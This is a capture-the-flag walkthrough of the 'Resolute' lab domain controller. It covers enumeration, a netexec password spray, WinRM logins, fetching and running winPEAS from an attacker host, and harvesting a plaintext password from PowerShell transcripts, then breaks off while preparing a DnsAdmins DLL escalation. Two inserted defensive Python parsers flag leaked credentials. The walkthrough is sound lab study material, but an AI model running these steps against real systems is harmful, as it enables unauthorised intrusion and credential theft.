Resolute
Recon
DNS
└─$ dig ANY megabank.local @10.129.96.155 +timeout=99 +tcp
; <<>> DiG 9.19.21-1-Debian <<>> ANY megabank.local @10.129.96.155 +timeout=99 +tcp
;; global options: +cmd
;; Got answer:
;; WARNING: .local is reserved for Multicast DNS
;; You are currently testing what happens when an mDNS query is leaked to DNS
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3036
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;megabank.local. IN ANY
;; ANSWER SECTION:
megabank.local. 600 IN A 10.10.10.169
megabank.local. 3600 IN NS resolute.megabank.local.
megabank.local. 3600 IN SOA resolute.megabank.local. hostmaster.megabank.local. 154 900 600 86400 3600
megabank.local. 600 IN AAAA dead:beef::b803:885a:b665:b183
;; ADDITIONAL SECTION:
resolute.megabank.local. 3600 IN A 10.129.96.155
;; Query time: 255 msec
;; SERVER: 10.129.96.155#53(10.129.96.155) (TCP)
;; WHEN: Wed Nov 27 10:26:39 EST 2024
;; MSG SIZE rcvd: 173
Enum4Linux
└─$ enum4linux-ng resolute.megabank.local | tee enum4linux.log
ENUM4LINUX - next generation (v1.3.4)
==========================
| Target Information |
==========================
[*] Target ........... resolute.megabank.local
[*] Username ......... ''
[*] Random Username .. 'wqbewllw'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
================================================
| Listener Scan on resolute.megabank.local |
================================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
===============================================================
| Domain Information via LDAP for resolute.megabank.local |
===============================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: megabank.local
======================================================================
| NetBIOS Names and Workgroup/Domain for resolute.megabank.local |
======================================================================
[-] Could not get NetBIOS names information via 'nmblookup': timed out
====================================================
| SMB Dialect Check on resolute.megabank.local |
====================================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
SMB 1.0: true
SMB 2.02: true
SMB 2.1: true
SMB 3.0: true
SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true
======================================================================
| Domain Information via SMB session for resolute.megabank.local |
======================================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: RESOLUTE
NetBIOS domain name: MEGABANK
DNS domain: megabank.local
FQDN: Resolute.megabank.local
Derived membership: domain member
Derived domain: MEGABANK
====================================================
| RPC Session Check on resolute.megabank.local |
====================================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[-] Could not establish random user session: STATUS_LOGON_FAILURE
==============================================================
| Domain Information via RPC for resolute.megabank.local |
==============================================================
[+] Domain: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436
[+] Membership: domain member
==========================================================
| OS Information via RPC for resolute.megabank.local |
==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[-] Could not get OS info via 'srvinfo': STATUS_ACCESS_DENIED
[+] After merging OS information we have the following result:
OS: Windows Server 2016 Standard 14393
OS version: '10.0'
OS release: '1607'
OS build: '14393'
Native OS: Windows Server 2016 Standard 14393
Native LAN manager: Windows Server 2016 Standard 6.3
Platform id: null
Server type: null
Server type string: null
================================================
| Users via RPC on resolute.megabank.local |
================================================
[*] Enumerating users via 'querydispinfo'
[+] Found 27 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 27 user(s) via 'enumdomusers'
[+] After merging user results we have 27 user(s) total:
'10101':
username: melanie
name: (null)
acb: '0x00000010'
description: (null)
'10102':
username: zach
name: (null)
acb: '0x00000010'
description: (null)
'10103':
username: simon
name: (null)
acb: '0x00000010'
description: (null)
'10104':
username: naoki
name: (null)
acb: '0x00000010'
description: (null)
'1105':
username: ryan
name: Ryan Bertrand
acb: '0x00000210'
description: (null)
'1111':
username: marko
name: Marko Novak
acb: '0x00000210'
description: Account created. Password set to Welcome123!
'500':
username: Administrator
name: (null)
acb: '0x00000210'
description: Built-in account for administering the computer/domain
'501':
username: Guest
name: (null)
acb: '0x00000215'
description: Built-in account for guest access to the computer/domain
'502':
username: krbtgt
name: (null)
acb: '0x00000011'
description: Key Distribution Center Service Account
'503':
username: DefaultAccount
name: (null)
acb: '0x00000215'
description: A user account managed by the system.
'6601':
username: sunita
name: (null)
acb: '0x00000010'
description: (null)
'6602':
username: abigail
name: (null)
acb: '0x00000010'
description: (null)
'6603':
username: marcus
name: (null)
acb: '0x00000010'
description: (null)
'6604':
username: sally
name: (null)
acb: '0x00000010'
description: (null)
'6605':
username: fred
name: (null)
acb: '0x00000010'
description: (null)
'6606':
username: angela
name: (null)
acb: '0x00000010'
description: (null)
'6607':
username: felicia
name: (null)
acb: '0x00000010'
description: (null)
'6608':
username: gustavo
name: (null)
acb: '0x00000010'
description: (null)
'6609':
username: ulf
name: (null)
acb: '0x00000010'
description: (null)
'6610':
username: stevie
name: (null)
acb: '0x00000010'
description: (null)
'6611':
username: claire
name: (null)
acb: '0x00000010'
description: (null)
'6612':
username: paulo
name: (null)
acb: '0x00000010'
description: (null)
'6613':
username: steve
name: (null)
acb: '0x00000010'
description: (null)
'6614':
username: annette
name: (null)
acb: '0x00000010'
description: (null)
'6615':
username: annika
name: (null)
acb: '0x00000010'
description: (null)
'6616':
username: per
name: (null)
acb: '0x00000010'
description: (null)
'6617':
username: claude
name: (null)
acb: '0x00000010'
description: (null)
=================================================
| Groups via RPC on resolute.megabank.local |
=================================================
[*] Enumerating local groups
[+] Found 5 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 29 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 16 group(s) via 'enumdomgroups'
[+] After merging groups results we have 50 group(s) total:
'1101':
groupname: DnsAdmins
type: local
'1102':
groupname: DnsUpdateProxy
type: domain
'1103':
groupname: Contractors
type: domain
'498':
groupname: Enterprise Read-only Domain Controllers
type: domain
'512':
groupname: Domain Admins
type: domain
'513':
groupname: Domain Users
type: domain
'514':
groupname: Domain Guests
type: domain
'515':
groupname: Domain Computers
type: domain
'516':
groupname: Domain Controllers
type: domain
'517':
groupname: Cert Publishers
type: local
'518':
groupname: Schema Admins
type: domain
'519':
groupname: Enterprise Admins
type: domain
'520':
groupname: Group Policy Creator Owners
type: domain
'521':
groupname: Read-only Domain Controllers
type: domain
'522':
groupname: Cloneable Domain Controllers
type: domain
'525':
groupname: Protected Users
type: domain
'526':
groupname: Key Admins
type: domain
'527':
groupname: Enterprise Key Admins
type: domain
'544':
groupname: Administrators
type: builtin
'545':
groupname: Users
type: builtin
'546':
groupname: Guests
type: builtin
'548':
groupname: Account Operators
type: builtin
'549':
groupname: Server Operators
type: builtin
'550':
groupname: Print Operators
type: builtin
'551':
groupname: Backup Operators
type: builtin
'552':
groupname: Replicator
type: builtin
'553':
groupname: RAS and IAS Servers
type: local
'554':
groupname: Pre-Windows 2000 Compatible Access
type: builtin
'555':
groupname: Remote Desktop Users
type: builtin
'556':
groupname: Network Configuration Operators
type: builtin
'557':
groupname: Incoming Forest Trust Builders
type: builtin
'558':
groupname: Performance Monitor Users
type: builtin
'559':
groupname: Performance Log Users
type: builtin
'560':
groupname: Windows Authorization Access Group
type: builtin
'561':
groupname: Terminal Server License Servers
type: builtin
'562':
groupname: Distributed COM Users
type: builtin
'568':
groupname: IIS_IUSRS
type: builtin
'569':
groupname: Cryptographic Operators
type: builtin
'571':
groupname: Allowed RODC Password Replication Group
type: local
'572':
groupname: Denied RODC Password Replication Group
type: local
'573':
groupname: Event Log Readers
type: builtin
'574':
groupname: Certificate Service DCOM Access
type: builtin
'575':
groupname: RDS Remote Access Servers
type: builtin
'576':
groupname: RDS Endpoint Servers
type: builtin
'577':
groupname: RDS Management Servers
type: builtin
'578':
groupname: Hyper-V Administrators
type: builtin
'579':
groupname: Access Control Assistance Operators
type: builtin
'580':
groupname: Remote Management Users
type: builtin
'581':
groupname: System Managed Accounts Group
type: builtin
'582':
groupname: Storage Replica Administrators
type: builtin
=================================================
| Shares via RPC on resolute.megabank.local |
=================================================
[*] Enumerating shares
[+] Found 0 share(s) for user '' with password '', try a different user
====================================================
| Policies via RPC for resolute.megabank.local |
====================================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
Password history length: 24
Minimum password length: 7
Maximum password age: not set
Password properties:
- DOMAIN_PASSWORD_COMPLEX: false
- DOMAIN_PASSWORD_NO_ANON_CHANGE: false
- DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
- DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
- DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
- DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
Lockout observation window: 30 minutes
Lockout duration: 30 minutes
Lockout threshold: None
Domain logoff information:
Force logoff time: not set
====================================================
| Printers via RPC for resolute.megabank.local |
====================================================
[-] Could not get printer info via 'enumprinters': STATUS_ACCESS_DENIED
Completed after 20.93 seconds
SMB
There seems to be a user, marko, with a default password left in the LDAP description field:
'1111':
username: marko
name: Marko Novak
acb: '0x00000210'
description: Account created. Password set to Welcome123!
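The same finding from the defender's side, as an added example that is not part of the original writeup: a parser for the enum4linux-ng user listing above that decodes the acb flags and reports descriptions that look like they carry a credential, plus accounts whose password never expires or is not required. The sample log embedded in it is constructed from entries shown on this page; the keyword list is an assumption.

```python
"""Parse an enum4linux-ng user listing, decode the acb flags and flag accounts
whose description leaks a credential. Added example; the sample log below is
constructed from the entries shown in the writeup above."""
import re

# Samba ACB bits as enum4linux-ng reports them in the 'acb' field.
ACB_FLAGS = {
    0x0001: "DISABLED", 0x0002: "HOMDIRREQ", 0x0004: "PWNOTREQ",
    0x0008: "TEMPDUP", 0x0010: "NORMAL", 0x0020: "MNS",
    0x0040: "DOMTRUST", 0x0080: "WSTRUST", 0x0100: "SVRTRUST",
    0x0200: "PWNOEXP", 0x0400: "AUTOLOCK",
}
# Words that usually mean someone typed a secret into the description attribute (assumed list).
SECRET_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)
RID_LINE = re.compile(r"^\s*'(\d+)':\s*$")
KV_LINE = re.compile(r"^\s*(username|name|acb|description):\s*(.*)$")

# Constructed sample: four of the 27 entries from the log above (indented as the tool prints them).
SAMPLE_LOG = """\
[+] After merging user results we have 4 user(s) total:
'10101':
  username: melanie
  name: (null)
  acb: '0x00000010'
  description: (null)
'1105':
  username: ryan
  name: Ryan Bertrand
  acb: '0x00000210'
  description: (null)
'1111':
  username: marko
  name: Marko Novak
  acb: '0x00000210'
  description: Account created. Password set to Welcome123!
'501':
  username: Guest
  name: (null)
  acb: '0x00000215'
  description: Built-in account for guest access to the computer/domain
"""


def parse_users(log: str) -> list:
    """Return one dict per user block (rid, username, name, acb, description)."""
    users, current = [], None
    for line in log.splitlines():
        m = RID_LINE.match(line)
        if m:
            current = {"rid": int(m.group(1))}
            users.append(current)
            continue
        m = KV_LINE.match(line)
        if m and current is not None:
            value = m.group(2).strip().strip("'")
            current[m.group(1)] = None if value == "(null)" else value
    # Group blocks ('groupname:' / 'type:') never get a username; drop them.
    return [u for u in users if "username" in u]


def decode_acb(acb: str) -> list:
    """Expand an acb hex string such as '0x00000215' into flag names, low bit first."""
    value = int(acb, 16)
    return [name for bit, name in sorted(ACB_FLAGS.items()) if value & bit]


def audit_users(log: str) -> list:
    """Return (username, finding) pairs a defender should act on."""
    findings = []
    for user in parse_users(log):
        flags = decode_acb(user["acb"])
        desc = user.get("description")
        if desc and SECRET_HINT.search(desc):
            findings.append((user["username"], f"credential hint in description: {desc}"))
        if "DISABLED" in flags:          # a disabled account cannot be sprayed
            continue
        if "PWNOEXP" in flags:
            findings.append((user["username"], "password never expires"))
        if "PWNOTREQ" in flags:
            findings.append((user["username"], "password not required"))
    return findings


if __name__ == "__main__":
    for username, finding in audit_users(SAMPLE_LOG):
        print(f"{username}: {finding}")
```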
└─$ grep username: enum4linux.log | awk '{print($2)}' > username.txt
└─$ netexec smb 10.129.96.155 -u username.txt -p 'Welcome123!' --continue-on-success
SMB 10.129.96.155 445 RESOLUTE [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB 10.129.96.155 445 RESOLUTE [+] megabank.local\melanie:Welcome123!
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\zach:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\simon:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\naoki:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\Administrator:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\krbtgt:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE
SMB 10.129.96.155 445 RESOLUTE [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE
Creds:
melanie:Welcome123!
WinRM
└─$ netexec winrm 10.129.96.155 -u 'melanie' -p 'Welcome123!'
WINRM 10.129.96.155 5985 RESOLUTE [*] Windows 10 / Server 2016 Build 14393 (name:RESOLUTE) (domain:megabank.local)
WINRM 10.129.96.155 5985 RESOLUTE [+] megabank.local\melanie:Welcome123! (Pwn3d!)
User.txt
*Evil-WinRM* PS C:\Users\melanie\Documents> ls -path $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/27/2024 7:30 AM 34 user.txt
4fd87ff78a1d48ddcdd8b6da08d39d0d
Privilege Escalation (ryan)
Hmm... nothing usable...
*Evil-WinRM* PS C:\Users\melanie\Music> curl 10.10.14.99/wp.exe -out wp.exe
*Evil-WinRM* PS C:\Users\melanie\Music> .\wp.exe | tee -filepath wp.log
...
Also nothing in /Program Files*, but if we go to the root (/) and list all files and directories we notice an unusual folder, PSTranscripts, which winpeas didn't find.
*Evil-WinRM* PS C:\> ls -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 11/27/2024 7:54 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 11/27/2024 7:29 AM 402653184 pagefile.sys
*Evil-WinRM* PS C:\PSTranscripts> ls /PSTranscripts -force -rec | % { $_.FullName }
C:\PSTranscripts\20191203
C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
*Evil-WinRM* PS C:\PSTranscripts> ls /PSTranscripts -force -rec -fil *.txt | cat
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Command start time: 20191203063455
**********************
PS>TerminatingError(): "System error."
>> CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Command start time: 20191203063455
**********************
PS>ParameterBinding(Out-String): name="InputObject"; value="PS megabank\ryan@RESOLUTE Documents> "
PS megabank\ryan@RESOLUTE Documents>
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="Stream"; value="True"
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
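Added example, not from the original writeup: a scanner for the PowerShell transcript format shown above that pulls out each Invoke-Expression command together with the user and start time from the transcript header, then flags commands that carry a credential on the command line (here, net use with a positional username and password). A defender can run it over a transcript store such as C:\PSTranscripts to find secrets that must be rotated. The sample transcript is constructed from the lines on this page; the pattern list is an assumption, not a complete catalogue.

```python
"""Scan Windows PowerShell transcripts (the format shown above) for commands that
carry a credential on the command line. Added example; the sample transcript is
constructed from the writeup's lines and the pattern list is an assumption."""
import re

HEADER_KV = re.compile(r"^(Username|RunAs User|Start time|Machine):\s*(.*)$")
CMD_START = re.compile(r"^Command start time:\s*(\d+)$")
COMMAND_VALUE = re.compile(
    r'ParameterBinding\(Invoke-Expression\): name="Command"; value="(.*)$')

# Command shapes that put a secret in argv (and therefore into the transcript).
CRED_PATTERNS = [
    ("net use with inline credentials",
     re.compile(r"\bnet\s+use\b.*\\\\\S+\s+(?!/)\S+", re.IGNORECASE)),
    ("net user password change",
     re.compile(r"\bnet\s+user\s+\S+\s+(?!/)\S+", re.IGNORECASE)),
    ("explicit /user: switch", re.compile(r"/user:", re.IGNORECASE)),
    ("plaintext SecureString",
     re.compile(r"ConvertTo-SecureString\b.*-AsPlainText", re.IGNORECASE)),
    ("password-style switch",
     re.compile(r"(?:^|\s)(?:-p|--password|/p:|-pass(?:word)?)\b", re.IGNORECASE)),
]

# Constructed sample: header plus the two command blocks seen in the transcript above.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
if (!$?) { if($LASTEXITCODE) { exit $LASTEXITCODE } else { exit 1 } }"
>> CommandInvocation(Out-String): "Out-String"
"""


def parse_transcript(text: str) -> list:
    """Return one record per Invoke-Expression command: user, start time, command text."""
    records, meta, current, buf = [], {}, None, None
    for line in text.splitlines():
        if buf is not None:                     # continuing a multi-line value="..."
            buf.append(line)
            if line.endswith('"'):
                records.append({**current, "command": "\n".join(buf)[:-1]})
                buf = None
            continue
        m = HEADER_KV.match(line)
        if m:
            meta[m.group(1)] = m.group(2).strip()
            continue
        m = CMD_START.match(line)
        if m:
            current = {"user": meta.get("Username"), "time": m.group(1)}
            continue
        m = COMMAND_VALUE.search(line)
        if m and current is not None:
            if line.endswith('"'):
                records.append({**current, "command": m.group(1)[:-1]})
            else:
                buf = [m.group(1)]
    return records


def find_leaked_credentials(text: str) -> list:
    """Flag commands whose first line matches a credential pattern; only the first
    line is checked because the remoting client appends an 'if (!$?) ...' wrapper."""
    hits = []
    for rec in parse_transcript(text):
        first_line = (rec["command"].splitlines() or [""])[0]
        for reason, pattern in CRED_PATTERNS:
            if pattern.search(first_line):
                hits.append({**rec, "command": first_line, "reason": reason})
                break
    return hits
```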
Privilege Escalation (Administrator)
Creds:
ryan:Serv3r4Admin4cc123!
└─$ evil-winrm -i 10.129.96.155 -u 'ryan' -p 'Serv3r4Admin4cc123!'
*Evil-WinRM* PS C:\Users\ryan> ls -path $ENV:USERPROFILE -fil *.txt -rec -file | % { $_; echo " "; cat $_.FullName; }
Directory: C:\Users\ryan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:34 AM 155 note.txt
Email to team:
- due to change freeze, any system changes (apart from those to the administrator account) will be automatically reverted within 1 minute
*Evil-WinRM* PS C:\Users\ryan> whoami /all
User Name SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Enumerate AD
└─$ cicada-mastertul -t 10.129.96.155 -u 'ryan' -p 'Serv3r4Admin4cc123!' -d megabank.local
----------------------------------------------------
Target IP: 10.129.96.155
Domain: megabank.local
Username: ryan
Password: Serv3r4Admin4cc123!
Full Mode Enabled
----------------------------------------------------
--------------------HAPPY HAUNTING!!----------------
---------------------------------------------------------------------------------------
[!x!] Scanning 10.129.96.155
[!] Enumerating SMB...
[+] SMB share drive names saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/smb_results/smb/share_names.txt
[+] SMB share drives list saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/smb_results/share_drives.txt
[*] Downloading SMB share files to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/smb_results/smb
[!] Connecting to WinRM...
[+] Connected to WinRM
[!] Enumerating Lookupsids using impacket...
[+] Lookupsids saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/lookupsid_results/lookupsid_file.txt
[+] Users list saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/lookupsid_results/users.txt
[!] Enumerating NPUsers using impacket...
[-] No NPUsers found
[!] Enumerating UserSPNs using impacket...
[-] No UserSPNs found
[!] Collecting Bloodhound Files...
[+] Bloodhound saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/bloodhound_results
[!] Enumerating LDAP...
[+] LDAP saved to /home/woyag/Desktop/Rooms/Resolute/mastertul/10.129.96.155/ldap_results
[!x!] Cleaning up...
There seems to be a second workstation on the domain.


DnsAdmin
I thought the DnsAdmins group was local to the domain itself, but it turns out it's a built-in role for AD. https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#dnsadmins
Members of the DnsAdmins group have access to network DNS information. The default permissions are Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain.
Tenable: DnsAdmins Exploitation
RedTeamNotes: From DnsAdmins to SYSTEM to Domain Compromise
DNSAdmin-DLL
└─$ curl -LOs https://github.com/kazkansouh/DNSAdmin-DLL/archive/refs/heads/master.zip
---
*Evil-WinRM* PS C:\Users\ryan\Music> curl 10.10.14.99/master.zip -outfile master.zip
*Evil-WinRM* PS C:\Users\ryan\Music> Expand-Archive master.zip
*Evil-WinRM* PS C:\Users\ryan\Music> cd master\DNSAdmin-DLL-master\DNSAdmin-DLL
*Evil-WinRM* PS C:\Users\ryan\Music\master\DNSAdmin-DLL-master\DNSAdmin-DLL> (ls / -rec -file -fil 'cl.exe' -erroraction silent).FullName
C:\Windows\WinSxS\amd64_microsoft-windows-wid-xtp_31bf3856ad364e35_10.0.14393.0_none_000422d4a08d9f88\cl.exe
